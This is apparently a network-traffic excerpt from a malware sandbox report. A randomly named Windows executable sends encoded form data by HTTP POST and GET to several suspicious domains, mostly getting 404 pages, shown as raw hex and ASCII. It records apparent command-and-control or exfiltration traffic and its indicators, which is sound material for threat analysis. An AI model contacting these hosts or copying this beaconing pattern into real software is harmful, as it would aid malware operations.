                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      55192.168.2.46337165.21.196.90803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:42.547439098 CEST10868OUTPOST /tmpg/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.030002304.xyz
                                                      Origin: http://www.030002304.xyz
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.030002304.xyz/tmpg/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 50 58 6e 61 6c 59 50 54 34 30 49 66 4f 49 4e 57 4c 69 42 57 76 76 6a 72 73 4c 74 4d 56 4e 6f 4f 38 6d 61 78 79 63 70 62 78 32 54 6f 36 78 2b 69 4d 46 44 71 47 48 58 76 54 6e 46 50 37 6c 76 4a 54 35 4b 49 61 75 6e 66 57 4d 58 52 50 62 77 79 78 54 35 67 43 71 48 4d 52 53 68 45 52 65 44 47 46 59 69 6e 7a 48 46 79 34 43 5a 61 49 49 76 6a 36 79 2f 30 69 34 78 37 62 45 4b 6c 7a 61 75 42 4f 34 67 66 6f 51 6e 75 35 38 68 47 4a 36 68 55 72 58 43 4b 50 36 68 72 30 69 58 50 57 63 46 58 32 7a 39 47 4e 62 45 5a 79 46 42 30 41 49 45 49 2f 69 46 31 4a 72 58 72 6e 47 50 66 78 57 71 44 34 75 6e 57 45 5a 76 71 6e 53 50 33 57 68 75 4f 63 61 73 37 54 4c 34 2f 76 75 6f 59 70 72 44 56 4b 71 6b 58 68 6c 37 2f 47 68 56 70 71 50 6c 47 47 7a 58 39 34 36 43 6b 2b 39 63 52 57 6b 55 62 4b 4f 65 31 5a 74 6e 78 35 45 69 59 4b 2b 6e 55 6d 4c 71 55 2f 71 67 45 4a 79 79 6e 35 6e 48 76 30 56 6d 4d 73 5a 72 4f 30 52 53 39 74 6d 42 51 67 77 6f 72 32 41 37 58 56 34 7a 6e 4a 64 75 68 6e 65 67 6a 71 4b 7a 52 73 4f 6b 4a 32 [TRUNCATED]
                                                      Data Ascii: pP_8=PXnalYPT40IfOINWLiBWvvjrsLtMVNoO8maxycpbx2To6x+iMFDqGHXvTnFP7lvJT5KIaunfWMXRPbwyxT5gCqHMRShEReDGFYinzHFy4CZaIIvj6y/0i4x7bEKlzauBO4gfoQnu58hGJ6hUrXCKP6hr0iXPWcFX2z9GNbEZyFB0AIEI/iF1JrXrnGPfxWqD4unWEZvqnSP3WhuOcas7TL4/vuoYprDVKqkXhl7/GhVpqPlGGzX946Ck+9cRWkUbKOe1Ztnx5EiYK+nUmLqU/qgEJyyn5nHv0VmMsZrO0RS9tmBQgwor2A7XV4znJduhnegjqKzRsOkJ2+TkCRvahxSTO9RIJtv99CkZ6zv73eaQyW9m3A7NNfqthqjlUqA0vKK6m1Zbi66KD/jXhGNDReoCwgoTEghByHsFwTQ3nuTDeNYS6Xd0ajYKwgeWm8CbdbRrdj0o0hMcbByrz+5jKNGHEa4t6zS1TJMFCDfGp+IdYGLPBA9j0DgvNPkD9bvDuaqvfQN+Q//I8tqcVPR/M1HO58xgII8FG6lgOht1nsafdcMvylb4LWGI0vate3v3/6kfCK6SsRTSfDyy2V8dmESI2E4frHy4UgdaQTmtqA2W1mEurC6K6EU3Q4juTmlRRDqWYOsTFhs/tJCNVM393ucGOdRIW6QyMdDeZCxEtGXJs4d8pHyPfxhKbS5t0OheHHcXHq5oY8SzIlN4PbjkR7Lz/as500i1EICkvBt26peTSVbfKC207SGIhQk5amox6KKB/vqA5zutOIS+bDwqSItXgQWf7tLMt1s9qexl5vnkn0IbsWUh3iQ78NGyTicTGwQNJKY8gyTjAsO77up+1CzaAL17mAxiEIw9CxFsHpCmqX0thDLWQBAYZOo1E6N0QLOWbqudiwEOrPQmmc+KOVcJPLmq4I1xrBHxZTWSvUfoqVqJMj7C0cDOA+8iLSG/qpUcPw/qxaOpGekpBUH/zkOu3xwEdBCM2uJrOm0631/BBfP [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      56192.168.2.46337265.21.196.90803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:45.093060970 CEST500OUTGET /tmpg/?pP_8=CVP6mu+p7AIAUeNlIzILzbbwoLVaLtEPp22R6YZws2HFwQ6gURLmFkDuTnsSzWDqU9qDd9fOW/TdFJInumJ7doiOdR5iBNH/a8rQv0stnRBrBPHE6g/KoYg=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.030002304.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:20:45.743110895 CEST1032INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:20:45 GMT
                                                      vary: User-Agent
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      57192.168.2.46337338.181.141.122803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:51.601202965 CEST760OUTPOST /c0yj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.kfowks.site
                                                      Origin: http://www.kfowks.site
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.kfowks.site/c0yj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 63 76 5a 70 4c 56 37 59 78 53 68 44 52 35 6f 43 36 48 64 42 2b 76 6b 74 2f 6b 34 76 6c 69 34 30 43 66 72 59 68 37 32 51 4d 6b 79 69 6c 30 43 37 44 57 51 34 77 4b 6b 49 30 56 72 2f 32 73 74 42 45 6a 65 4b 42 4f 42 39 32 2f 53 61 58 62 4b 64 48 5a 5a 76 4a 79 72 44 45 49 49 47 55 54 4b 4e 41 56 68 52 45 31 79 51 50 50 31 5a 41 42 66 53 36 39 64 6d 2f 79 45 72 6c 46 72 6b 32 6b 4d 54 34 49 63 35 38 49 76 35 38 49 51 56 49 4f 65 6a 50 46 2f 6e 35 52 2f 4b 67 56 74 54 47 59 2f 64 46 75 5a 69 56 75 66 72 79 36 6e 2f 39 50 64 65 78 6d 5a 49 42 54 54 74 45 30 4d 34 48 49 37 6b 45 67 3d 3d
                                                      Data Ascii: pP_8=cvZpLV7YxShDR5oC6HdB+vkt/k4vli40CfrYh72QMkyil0C7DWQ4wKkI0Vr/2stBEjeKBOB92/SaXbKdHZZvJyrDEIIGUTKNAVhRE1yQPP1ZABfS69dm/yErlFrk2kMT4Ic58Iv58IQVIOejPF/n5R/KgVtTGY/dFuZiVufry6n/9PdexmZIBTTtE0M4HI7kEg==
                                                      Sep 11, 2024 11:20:53.091767073 CEST492INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 11 Sep 2024 09:20:59 GMT
                                                      Connection: close
                                                      Content-Length: 315
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      58192.168.2.46337438.181.141.122803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:54.142148018 CEST780OUTPOST /c0yj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.kfowks.site
                                                      Origin: http://www.kfowks.site
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.kfowks.site/c0yj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 63 76 5a 70 4c 56 37 59 78 53 68 44 52 59 59 43 70 30 46 42 76 2f 6b 75 36 6b 34 76 76 43 34 77 43 66 33 59 68 2f 48 4e 50 57 57 69 6c 57 61 37 43 58 51 34 7a 4b 6b 49 37 31 72 2b 34 4d 73 44 45 6a 62 35 42 50 39 39 32 38 75 61 58 5a 43 64 48 71 68 6f 54 43 72 57 64 59 49 45 5a 7a 4b 4e 41 56 68 52 45 31 6e 48 50 50 39 5a 42 79 58 53 37 66 6c 6c 78 53 45 6b 74 6c 72 6b 39 45 4e 55 34 49 64 63 38 4b 4c 58 38 4f 63 56 49 4d 47 6a 50 52 72 6f 32 52 2b 44 75 31 73 43 57 37 4f 6b 4e 75 6f 7a 54 5a 32 50 74 4c 62 47 31 70 4d 45 67 58 34 66 54 54 33 65 5a 7a 46 4d 4b 4c 47 74 66 6b 32 6d 67 35 64 2b 74 35 45 35 4c 72 64 61 5a 56 50 31 68 4f 59 3d
                                                      Data Ascii: pP_8=cvZpLV7YxShDRYYCp0FBv/ku6k4vvC4wCf3Yh/HNPWWilWa7CXQ4zKkI71r+4MsDEjb5BP9928uaXZCdHqhoTCrWdYIEZzKNAVhRE1nHPP9ZByXS7fllxSEktlrk9ENU4Idc8KLX8OcVIMGjPRro2R+Du1sCW7OkNuozTZ2PtLbG1pMEgX4fTT3eZzFMKLGtfk2mg5d+t5E5LrdaZVP1hOY=
                                                      Sep 11, 2024 11:20:55.058460951 CEST492INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 11 Sep 2024 09:21:01 GMT
                                                      Connection: close
                                                      Content-Length: 315
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      59192.168.2.46337538.181.141.122803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:57.020370007 CEST10862OUTPOST /c0yj/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.kfowks.site
                                                      Origin: http://www.kfowks.site
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.kfowks.site/c0yj/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 63 76 5a 70 4c 56 37 59 78 53 68 44 52 59 59 43 70 30 46 42 76 2f 6b 75 36 6b 34 76 76 43 34 77 43 66 33 59 68 2f 48 4e 50 57 65 69 6c 6a 4f 37 41 77 6b 34 79 4b 6b 49 6c 6c 72 37 34 4d 74 62 45 6e 50 6d 42 50 78 44 32 35 71 61 55 37 36 64 46 62 68 6f 64 79 72 57 41 49 49 46 55 54 4c 48 41 57 4a 56 45 31 33 48 50 50 39 5a 42 7a 6e 53 38 4e 64 6c 68 69 45 72 6c 46 72 6f 32 6b 4d 7a 34 49 31 6d 38 4b 66 70 39 2b 38 56 49 73 57 6a 41 43 44 6f 2f 52 2b 4e 6a 56 73 61 57 37 43 46 4e 75 45 2f 54 63 4c 71 74 4c 2f 47 32 2b 68 42 79 6b 51 77 58 52 6e 54 4d 7a 70 74 44 4d 33 72 62 6b 53 7a 75 4a 52 2b 2f 34 73 53 47 49 68 52 63 47 4c 33 39 4c 31 51 58 4b 62 73 6d 45 46 41 50 6a 79 77 72 58 66 4a 64 46 57 38 62 41 70 64 44 34 41 6b 49 4c 57 4e 36 4d 62 51 4f 52 58 62 63 44 5a 68 6e 48 71 57 62 67 6f 6b 69 4c 62 55 4d 72 31 74 78 76 61 4e 61 43 44 74 61 4c 53 67 78 65 2f 6a 45 5a 4b 5a 64 71 6c 76 39 6a 56 4d 4b 5a 5a 74 46 58 54 6d 4f 38 6d 75 59 43 63 69 46 49 2f 7a 38 50 63 78 41 6a 47 4b 62 [TRUNCATED]
                                                      Data Ascii: pP_8=cvZpLV7YxShDRYYCp0FBv/ku6k4vvC4wCf3Yh/HNPWeiljO7Awk4yKkIllr74MtbEnPmBPxD25qaU76dFbhodyrWAIIFUTLHAWJVE13HPP9ZBznS8NdlhiErlFro2kMz4I1m8Kfp9+8VIsWjACDo/R+NjVsaW7CFNuE/TcLqtL/G2+hBykQwXRnTMzptDM3rbkSzuJR+/4sSGIhRcGL39L1QXKbsmEFAPjywrXfJdFW8bApdD4AkILWN6MbQORXbcDZhnHqWbgokiLbUMr1txvaNaCDtaLSgxe/jEZKZdqlv9jVMKZZtFXTmO8muYCciFI/z8PcxAjGKbyQ5GQKmh9STq1SHGilttZWkMJKBo9CjhazBKKuiChwuMvSMe/DZXGSDMjWIYTX1xcMcXr05c7Co5Ipi38JD39VfH5/ChzpPlij5Sh7J1XVDzDYAwSDQzufTNTEFM6XWmkcy/amz9kXsl308ngG7z/ignqfxtsPFUOXRcqr4qjXpGM9TyvKwqa8x85HJY17WwQlQCJs2iCX7XCSrgZVxsrFjXD4tqtrOp6ykRttkef7pRiYNKz42wc8BDiidkl3UKpzjnHTLcPLA8InBxCcWbQ1H4QAjcGNuJvx5FGyeM/jB+/NQ/PhdF29+paQ5LgbCqOQ7AE7Omrji64NrkPWitOwN2ugdw/9BQTIi2Ypunk0lnaGq7BIpJCcXC5HyylGjmKGhFcVZqgxsAWl6cuGof89eOmgFqN63PDrmcTk2ifZt6iekgJwRQnYYWZ4F7Ld1ISAedw5y4r9uJvFMI5/37Jko/ELirgTA+wAsq8BzbEZ9ZT9WTgGAuAkCYQKiLBcJ6zr8JZFeQhpNS4z+kYphgazxBgGB7UClEW2WFSwOlXhtyatHRnaA9Lrlxxf9UNgApm7V3TPCw70RU8QIVc1ydi9JDui6w9hN7mX8H1MAyLnMpAP3zm7W2qju5u1ycxT5xgCI/DpB3GS6MFX7kICbpVJ3qyYHR7XRy4j [TRUNCATED]
                                                      Sep 11, 2024 11:20:57.931412935 CEST492INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 11 Sep 2024 09:21:05 GMT
                                                      Connection: close
                                                      Content-Length: 315
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      60192.168.2.46337638.181.141.122803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:59.831751108 CEST498OUTGET /c0yj/?pP_8=RtxJIiPVwFtoON8X5lg1/pck0zde3AcVW+Sw8LHuBGbwhWeZHgga75pQywOD+eRBU36nZddvjNScILyGR/VfIgCLIuIjBhPcY00gClaWQM5nJXPcxtJH+zI=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.kfowks.site
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:21:00.793679953 CEST492INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 11 Sep 2024 09:21:07 GMT
                                                      Connection: close
                                                      Content-Length: 315
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      61192.168.2.46337781.88.63.4680
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:21:09.439260960 CEST495OUTGET /a4ar/?V0Qh=4pBta8&pP_8=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.2bhp.com
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:21:10.103210926 CEST367INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:21:10 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
